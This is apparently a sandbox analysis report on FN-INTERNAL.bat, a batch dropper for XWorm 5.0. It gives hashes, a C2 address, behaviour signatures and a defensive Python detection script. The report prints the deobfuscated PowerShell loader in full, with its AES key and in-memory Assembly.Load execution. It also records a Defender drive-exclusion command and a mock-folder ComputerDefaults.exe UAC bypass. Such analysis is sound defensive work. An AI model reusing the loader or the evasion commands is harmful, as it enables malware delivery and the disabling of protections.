Analysis

max time kernel: 1800s
max time network: 1797s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 26-05-2024 14:55
Static task: static1

Behavioral tasks (all with sample FN-INTERNAL.bat):
behavioral1: resource win10-20240404-en
behavioral2: resource win7-20240508-en
behavioral3: resource win10v2004-20240508-en

The platform block above (windows11-21h2_x64, win11-20240508-en) describes a fourth run that this task list does not enumerate; the memory-dump match under Signatures refers to it as behavioral4.
General

Target: FN-INTERNAL.bat
Size: 376KB
MD5: 121a69448e9f5eef0ba4c1229b471208
SHA1: 90abf42b20fb75a7f922b4a83cbeb77ca5dbf5d0
SHA256: b383a0ab3670e505ae0b7a7b6d68c096bb799ce858d8afc2e2ef5d1c1314051a
SHA512: c9e903245c3ab434018e23e4c51bf9d4fcbdb9dc1b85114574c12a2ce5c3ec6cd811fa1b51a34c86c695c6ba79cade1cdc215c4953090a342ba4ff6c1a92bc3d
SSDEEP: 6144:C+g8ai0m+BiS0FY9tRpUOAIeJxsOjzW1JlW5nHa5EV8hpzjHRQbh9xph9aK7PGaj:C+gdOSOYbRHjeJxbOJlW5niJSdT9amGk
Malware Config

Extracted
Family: xworm
Version: 5.0
C2: software-led.gl.at.ply.gg:38954
Additional string (unlabelled in the source report): m6tgeOEIIMDuaFcQ
install_file: USB.exe

The C2 host is under ply.gg, the domain of the playit.gg tunnelling service, so it resolves to a tunnel endpoint rather than the operator's own server; block and hunt on the full host:port pair.
Signatures

Detect Xworm Payload (1 IoC)
    resource: behavioral4/memory/1308-103-0x00000277A2920000-0x00000277A292E000-memory.dmp
    yara_rule: family_xworm
    The match is in the memory of powershell.exe PID 1308: the payload runs inside the PowerShell host, not as a separate executable.

Blocklisted process makes network request (1 IoC)
    flow 2: powershell.exe PID 1308

Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)
    Run Powershell and hide display window.
    powershell.exe PIDs: 1308, 1528, 4588, 2588, 2024, 1360, 1176

Executes dropped EXE (1 IoC)
    ComputerDefaults.exe PID 2072

Loads dropped DLL (1 IoC)
    ComputerDefaults.exe PID 2072

Drops file in System32 directory (2 IoCs)
    File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx  svchost.exe
    File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx  svchost.exe
    Both writes come from the Event Log service host (svchost.exe PID 1376 in the process tree) updating its own .evtx files, which happens on any Windows system; this is not evidence of log tampering by the sample.
Modifies data under HKEY_USERS (53 IoCs)
Processes: svchost.exe (every entry; the process tree marks PID 2564, -k NetworkService)
Paths below are relative to \REGISTRY\USER\S-1-5-20\Software\ (the NetworkService profile) unless a full path is given.
    Key created  Microsoft\SystemCertificates\Disallowed\CTLs
    Key created  Microsoft\SystemCertificates\Root
    Key created  Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
    Set value (str)  Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"
    Key created  Microsoft\SystemCertificates\SmartCardRoot\CRLs
    Key created  Microsoft\SystemCertificates\TrustedPeople
    Key created  Policies\Microsoft\SystemCertificates\TrustedPeople
    Key created  Microsoft\SystemCertificates\CA\Certificates
    Key created  Policies\Microsoft\SystemCertificates\Disallowed\Certificates
    Key created  Microsoft\SystemCertificates\Root\Certificates
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2"
    Key created  Policies\Microsoft\SystemCertificates\CA\Certificates
    Key created  Microsoft\SystemCertificates\trust\Certificates
    Key created  Policies\Microsoft\SystemCertificates\CA\CRLs
    Key created  Microsoft\SystemCertificates\TrustedPeople\CRLs
    Key created  Microsoft\SystemCertificates\TrustedPeople\Certificates
    Key created  Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
    Key created  Policies\Microsoft\SystemCertificates\trust\Certificates
    Set value (str)  Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"
    Key created  Microsoft\SystemCertificates\SmartCardRoot
    Key created  Microsoft\SystemCertificates\SmartCardRoot\Certificates
    Key created  Microsoft\SystemCertificates\Disallowed\CRLs
    Key created  Microsoft\SystemCertificates\Root\CTLs
    Key created  Policies\Microsoft\SystemCertificates\trust\CRLs
    Key created  Microsoft\SystemCertificates\Root\CRLs
    Set value (str)  Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"
    Key created  Microsoft\SystemCertificates\CA\CRLs
    Key created  Microsoft\SystemCertificates\Disallowed\Certificates
    Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8"
    Key created  Policies\Microsoft\SystemCertificates\trust
    Key created  \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
    Key created  Policies\Microsoft\SystemCertificates\CA\CTLs
    Key created  Policies\Microsoft\SystemCertificates\Disallowed\CRLs
    Key created  Microsoft\SystemCertificates\trust\CTLs
    Key created  Policies\Microsoft\SystemCertificates\trust\CTLs
    Set value (str)  Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"
    Set value (str)  Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"
    Key created  Policies\Microsoft\SystemCertificates\Disallowed\CTLs
    Key created  Microsoft\SystemCertificates\trust
    Set value (str)  Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"
    Key created  Microsoft\SystemCertificates\CA\CTLs
    Set value (str)  Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption"
    Key created  Policies\Microsoft\SystemCertificates\CA
    Key created  Policies\Microsoft\SystemCertificates\Disallowed
    Key created  Microsoft\SystemCertificates\TrustedPeople\CTLs
    Key created  Microsoft\SystemCertificates\trust\CRLs
    Key created  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
    Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL
    Key created  Microsoft\SystemCertificates\SmartCardRoot\CTLs
    Key created  Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
    Set value (str)  Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"
    Key created  Microsoft\SystemCertificates\CA
    Key created  Microsoft\SystemCertificates\Disallowed
Caveat: certificate-store, MuiCache, IdentityCRL and WinHTTP proxy keys being created under the NetworkService, LocalService and .DEFAULT hives by svchost.exe is routine Windows service start-up activity in a fresh sandbox image. Treat this list as background noise; none of the values reference the sample.
Modifies registry class (36 IoCs)
Processes: svchost.exe (35 entries), Explorer.EXE (1 entry)
Paths below are relative to \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\ unless a full path is given; CDM stands for Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy and CBS for MicrosoftWindows.Client.CBS_cw5n1h2txyewy.
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PTT = "133612106192786760"  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PTT = "133612106825755852"  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PTT = "133612106195443241"  svchost.exe
    Key created  CBS\HAM\AUI  svchost.exe
    Key created  CBS\HAM\AUI\Global.IrisService\V1  svchost.exe
    Key created  CBS\HAM\AUI\Global.IrisService\V1\LU  svchost.exe
    Key created  CDM\HAM\AUI\App  svchost.exe
    Key created  CDM\HAM\AUI\App\V1\LU  svchost.exe
    Set value (int)  CBS\HAM\AUI\Global.IrisService\V1\LU\PTT = "133612106067474752"  svchost.exe
    Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\  Explorer.EXE
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PTT = "133612105831693077"  svchost.exe
    Set value (int)  CBS\HAM\AUI\Global.Accounts\V1\LU\PTT = "133612106071068453"  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PCT = "133612106172786875"  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PTT = "133612106202786950"  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PCT = "133612106814193052"  svchost.exe
    Key created  CBS\HAM\AUI\Global.Accounts\V1\LU  svchost.exe
    Set value (int)  CBS\HAM\AUI\Global.Accounts\V1\LU\PCT = "133612105464036866"  svchost.exe
    Key created  (SystemAppData itself)  svchost.exe
    Key created  CDM\HAM\AUI  svchost.exe
    Key created  CDM\HAM\AUI\App\V1  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PTT = "133612106189661809"  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PTT = "133612106495755401"  svchost.exe
    Key created  CBS  svchost.exe
    Set value (int)  CBS\HAM\AUI\Global.IrisService\V1\LU\PCT = "133612096445443001"  svchost.exe
    Set value (int)  CBS\HAM\AUI\Global.IrisService\V1\LU\PTT = "133612097051224523"  svchost.exe
    Key created  CBS\HAM\AUI\Global.Accounts  svchost.exe
    Set value (int)  CBS\HAM\AUI\Global.IrisService\V1\LU\PCT = "133612105464036866"  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PCT = "133612105464192919"  svchost.exe
    Key created  CBS\HAM\AUI\Global.IrisService  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PCT = "133612106147631139"  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PCT = "133612106482786628"  svchost.exe
    Key created  CBS\HAM\AUI\Global.Accounts\V1  svchost.exe
    Key created  CDM  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PTT = "133612105544974319"  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PCT = "133612105799192988"  svchost.exe
    Set value (int)  CDM\HAM\AUI\App\V1\LU\PCT = "133612106188880753"  svchost.exe
Caveat: these are Windows' own bookkeeping keys for the inbox app packages (ContentDeliveryManager, Client.CBS) whose backgroundTaskHost.exe instances appear in the process tree. The PTT/PCT values are 64-bit FILETIME timestamps (100 ns ticks since 1601-01-01); 1336121xxxxxxxxxx corresponds to 2024-05-26, the analysis time. Nothing here is attributable to the sample.
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: powershell.exe only. Entries in the order reported (pid process x count):
    2024 powershell.exe x2
    1360 powershell.exe x2
    1308 powershell.exe x2
    1176 powershell.exe x2
    1528 powershell.exe x2
    2332 powershell.exe x2
    4588 powershell.exe x2
    1308 powershell.exe x32
    4072 powershell.exe x2
    1308 powershell.exe x6
    2588 powershell.exe x2
    1308 powershell.exe x3
    2024 powershell.exe x5
PID 1308, the process whose memory matched family_xworm, accounts for 43 of the 64 entries.

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
    powershell.exe PID 1308

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: powershell.exe (PIDs 2024, 1360, 1308, 1176, 1528, 2332, 4588). Entries in the order reported:
    SeDebugPrivilege: 2024, 1360, 1308, 1176, 1528 (one entry each)
    2332 powershell.exe, 22 entries: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
    4588 powershell.exe, 37 entries: SeDebugPrivilege, then the same 21-entry run as 2332 (SeIncreaseQuotaPrivilege through 36), then SeIncreaseQuotaPrivilege through SeRemoteShutdownPrivilege once more (15 entries; the list is capped at 64)
The numeric entries are privilege LUIDs the sandbox did not name: 33 SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege, 36 SeDelegateSessionUserImpersonatePrivilege. Enabling every privilege in the token in one sweep (PIDs 2332 and 4588) is the signature of a blanket AdjustTokenPrivileges call over all privileges the token holds.
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: cmd.exe, powershell.exe, cmd.exe, ComputerDefaults.exe, cmd.exe, powershell.exe
Writes from each parent into the child it launched (each of these is recorded twice in the raw report); together they trace the launch chain:
    3716 cmd.exe -> 2852 cmd.exe
    3716 cmd.exe -> 1624 cmd.exe
    3716 cmd.exe -> 2024 powershell.exe
    2024 powershell.exe -> 1360 powershell.exe
    2024 powershell.exe -> 3968 cmd.exe
    3968 cmd.exe -> 2072 ComputerDefaults.exe
    2072 ComputerDefaults.exe -> 3380 cmd.exe
    3380 cmd.exe -> 1552 cmd.exe
    3380 cmd.exe -> 2628 cmd.exe
    3380 cmd.exe -> 1308 powershell.exe
    1308 powershell.exe -> 1176 powershell.exe
    1308 powershell.exe -> 1528 powershell.exe
    1308 powershell.exe -> 2332 powershell.exe
    1308 powershell.exe -> 4588 powershell.exe
Cross-process writes by 1308 powershell.exe (the process whose memory matched family_xworm) into processes that are not its children, one entry each:
    1308 powershell.exe -> 3240 Explorer.EXE
    1308 powershell.exe -> svchost.exe PIDs 1180, 2256, 980, 1752, 2496, 2728, 2684, 2736, 1720, 1128, 2504, 476, 1408, 924, 1908, 1512, 1848, 5052, 1700, 3472, 1060, 1096, 4392, 1284, 1480, 2856, 2656, 1668, 4024, 1856, 1264, 1000, 860, 460, 3412 (35 entries; the list is capped at 64)
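The launch chain recorded above, turned into a detection. This is an added example and not part of the sandbox report: it indexes process-creation records by PID, walks each process's ancestry, and flags the parent/child relationships that make the chain anomalous. The records are constructed here from the PIDs, images and parent links in this report; command lines are taken from the report's process tree where it shows them and are labelled stand-ins otherwise. Rule names and field names are this example's own, and the ComputerDefaults.exe rules should be baselined against your own telemetry before deployment.

```python
"""Ancestry-based detection for the launch chain this report records under
'Suspicious use of WriteProcessMemory':
Explorer.EXE -> cmd.exe (FN-INTERNAL.bat) -> powershell.exe -> cmd.exe ->
ComputerDefaults.exe -> cmd.exe -> powershell.exe -> powershell.exe (x4).
Input is process-creation telemetry (Sysmon Event ID 1 or an EDR equivalent);
the records below are CONSTRUCTED from the PIDs in the report."""
from dataclasses import dataclass
from typing import Dict, List, Tuple

Alert = Tuple[str, int]  # (rule name, pid)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # file name only; matched case-insensitively
    cmdline: str


# Constructed records: PIDs, images and parent links as reported. Command lines
# are those shown in the report's process tree where available, stand-ins otherwise.
EVENTS: List[ProcEvent] = [
    ProcEvent(3240, 0, "Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    ProcEvent(3716, 3240, "cmd.exe",
              r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat"'),
    ProcEvent(2852, 3716, "cmd.exe", r'cmd /c "set __=^&rem"'),
    ProcEvent(1624, 3716, "cmd.exe", "cmd.exe /S /D /c <echoes the PowerShell loader>"),
    ProcEvent(2024, 3716, "powershell.exe", "powershell.exe <stand-in>"),
    ProcEvent(3968, 2024, "cmd.exe", "cmd.exe <stand-in>"),
    ProcEvent(2072, 3968, "ComputerDefaults.exe", "ComputerDefaults.exe <stand-in>"),
    ProcEvent(3380, 2072, "cmd.exe", "cmd.exe <stand-in>"),
    ProcEvent(1308, 3380, "powershell.exe", "powershell.exe <stand-in>"),
    ProcEvent(1176, 1308, "powershell.exe", "powershell.exe <stand-in>"),
    ProcEvent(1528, 1308, "powershell.exe", "powershell.exe <stand-in>"),
    # Control record: the same binary with an ordinary explorer.exe parent.
    ProcEvent(5000, 3240, "ComputerDefaults.exe", "ComputerDefaults.exe <stand-in>"),
]


def index_by_pid(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}


def ancestry(index: Dict[int, ProcEvent], pid: int, limit: int = 32) -> List[ProcEvent]:
    """The process itself first, then each parent. Stops at an unknown PID, at the
    limit, or on a repeat (PID reuse can otherwise turn the walk into a loop)."""
    chain: List[ProcEvent] = []
    seen = set()
    while pid in index and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(index[pid])
        pid = index[pid].ppid
    return chain


def image_chain(index: Dict[int, ProcEvent], pid: int) -> List[str]:
    return [e.image.lower() for e in ancestry(index, pid)]


def detect(events: List[ProcEvent]) -> List[Alert]:
    """Encode the relationships that make the reported chain anomalous."""
    index = index_by_pid(events)
    alerts: List[Alert] = []
    for ev in events:
        chain = image_chain(index, ev.pid)   # chain[0] is ev itself
        me = chain[0]
        parent = index.get(ev.ppid)
        pimg = parent.image.lower() if parent else ""
        # 1. PowerShell started by a cmd.exe that is running a batch file.
        if me == "powershell.exe" and pimg == "cmd.exe" and ".bat" in parent.cmdline.lower():
            alerts.append(("powershell_from_batch_cmd", ev.pid))
        # 2. ComputerDefaults.exe started from a command shell.
        if me == "computerdefaults.exe" and pimg == "cmd.exe":
            alerts.append(("computerdefaults_from_cmd", ev.pid))
        # 3. ComputerDefaults.exe itself spawning a shell.
        if me in ("cmd.exe", "powershell.exe") and pimg == "computerdefaults.exe":
            alerts.append(("shell_from_computerdefaults", ev.pid))
        # 4. PowerShell spawning PowerShell.
        if me == "powershell.exe" and pimg == "powershell.exe":
            alerts.append(("powershell_spawns_powershell", ev.pid))
        # 5. Any PowerShell with ComputerDefaults.exe somewhere in its ancestry.
        if me == "powershell.exe" and "computerdefaults.exe" in chain[1:]:
            alerts.append(("powershell_under_computerdefaults", ev.pid))
    return alerts


if __name__ == "__main__":
    idx = index_by_pid(EVENTS)
    for rule, pid in detect(EVENTS):
        print(f"{rule:36} pid={pid}  chain: {' <- '.join(image_chain(idx, pid))}")
```

Rule 5 is the one that survives the loader changing its intermediate steps: it matches on ancestry rather than on the immediate parent, so a powershell.exe several layers below ComputerDefaults.exe still fires. The control record (PID 5000) shows why rules 2 and 3 look at the parent image instead of the binary name alone.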
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

Indented by launch depth, PID in brackets, signature hits in parentheses. The listing on this page stops at the cmd.exe that echoes the PowerShell loader; the powershell.exe processes referenced in the signatures (2024, 1308 and their children) come after that point and are not shown here. Note that PID 1360 appears below as backgroundTaskHost.exe and in the signatures as powershell.exe: the PID was reused after one of the two exited, so correlate on PID plus start time rather than PID alone.

C:\Windows\system32\svchost.exe -k DcomLaunch -p  [PID 800]  (Modifies registry class)
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca  [PID 1572]
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca  [PID 1360]
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca  [PID 2204]
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca  [PID 2836]
    C:\Windows\System32\RuntimeBroker.exe -Embedding  [PID 1932]
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca  [PID 772]
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca  [PID 1956]
    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}  [PID 1452]
    C:\Windows\system32\BackgroundTransferHost.exe: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1  [PID 3308]
    C:\Windows\system32\BackgroundTransferHost.exe: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1  [PID 2532]
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca  [PID 1548]
    C:\Windows\system32\BackgroundTransferHost.exe: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1  [PID 2716]
    C:\Windows\system32\BackgroundTransferHost.exe: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1  [PID 4828]
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca  [PID 1044]
    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca  [PID 1032]
C:\Windows\system32\svchost.exe -k RPCSS -p  [PID 924]
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM  [PID 980]
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  [PID 476]
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts  [PID 460]
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService  [PID 860]
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc  [PID 1060]
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p  [PID 1096]
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule  [PID 1128]
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi  [PID 1180]
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc  [PID 1236]
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm  [PID 1264]
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc  [PID 1284]
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog  [PID 1376]  (Drops file in System32 directory)
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager  [PID 1408]
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem  [PID 1480]
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes  [PID 1512]
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS  [PID 1668]
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder  [PID 1700]
C:\Windows\system32\svchost.exe -k NetworkService -p  [PID 1720]
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp  [PID 1848]
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  [PID 1856]
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  [PID 2016]
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p  [PID 2028]
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection  [PID 1752]
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository  [PID 1908]
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p  [PID 2192]
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation  [PID 2256]
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc  [PID 2380]
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT  [PID 2496]
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent  [PID 2504]
C:\Windows\system32\svchost.exe -k NetworkService -p  [PID 2564]  (Modifies data under HKEY_USERS)
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer  [PID 2656]
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks  [PID 2684]
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt  [PID 2728]
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService  [PID 2736]
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc  [PID 2856]
C:\Windows\Explorer.EXE  [PID 3240]  (Modifies registry class)
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat"  [PID 3716]  (Suspicious use of WriteProcessMemory)
        cmd /c "set __=^&rem"  [PID 2852]
            (assigns the literal "&rem" to the variable __ and does nothing else; the caret escapes the ampersand)
        C:\Windows\system32\cmd.exe /S /D /c" echo <PowerShell loader, reproduced below with line breaks added> "  [PID 1624]

            function decrypt_function($param_var){
                $aes_var=[System.Security.Cryptography.Aes]::Create();
                $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
                $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
                $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('97S5HKOOEHVTK1tx3yu5lTndq7VoLhaiBMi1fQ7XC/w=');
                $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BY/5WS5SKbagLrml3T2b0A==');
                $decryptor_var=$aes_var.CreateDecryptor();
                $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
                $decryptor_var.Dispose();
                $aes_var.Dispose();
                $return_var;
            }
            function decompress_function($param_var){
                $ERsLU=New-Object System.IO.MemoryStream(,$param_var);
                $BcZuZ=New-Object System.IO.MemoryStream;
                $aYIjw=New-Object System.IO.Compression.GZipStream($ERsLU, [IO.Compression.CompressionMode]::Decompress);
                $aYIjw.CopyTo($BcZuZ);
                $aYIjw.Dispose();
                $ERsLU.Dispose();
                $BcZuZ.Dispose();
                $BcZuZ.ToArray();
            }
            function execute_function($param_var,$param2_var){
                $WzoGX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);
                $uXAck=$WzoGX.EntryPoint;
                $uXAck.Invoke($null, $param2_var);
            }
            $FVRVU = 'C:\Users\Admin\AppData\Local\Temp\FN-INTERNAL.bat';
            $host.UI.RawUI.WindowTitle = $FVRVU;
            $gLqRi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FVRVU).Split([Environment]::NewLine);
            foreach ($pQPCS in $gLqRi) {
                if ($pQPCS.StartsWith('VPEeCHQfOWHyYXzmlFZZ')) { $YmBxU=$pQPCS.Substring(20); break; }
            }
            $payloads_var=[string[]]$YmBxU.Split('\');
            $payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));
            $payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));
            execute_function $payload1_var $null;
            execute_function $payload2_var (,[string[]] (''));

What the loader does: the three .NET method names are hidden by storing them reversed and re-joining them at runtime ('gnirtS46esaBmorF'[-1..-16] -join '' evaluates to FromBase64String, 'daoL'[-1..-4] to Load, 'txeTllAdaeR'[-1..-11] to ReadAllText), which is enough to defeat a naive string match on "Assembly]::Load". It reads its own batch file, takes the line that starts with the 20-character marker VPEeCHQfOWHyYXzmlFZZ, splits the remainder on '\' into two blobs, undoes a trivial alphabet substitution ('#' stands for '/', '@' for 'A'), base64-decodes, decrypts with AES-256-CBC/PKCS7 under the hard-coded key and IV (32 and 16 bytes once decoded), GZip-decompresses, and loads each result as a .NET assembly in-process with Assembly.Load, invoking its entry point (the first with no arguments, the second with a single empty string). The loader itself never writes the decoded assemblies to disk, which matches the XWorm detection being a memory dump of powershell.exe rather than a file. Because the key and IV are static and embedded in the script, both payloads can be recovered from the batch file without executing anything.
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c call SC.cmd6⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"7⤵PID:1552
-
-
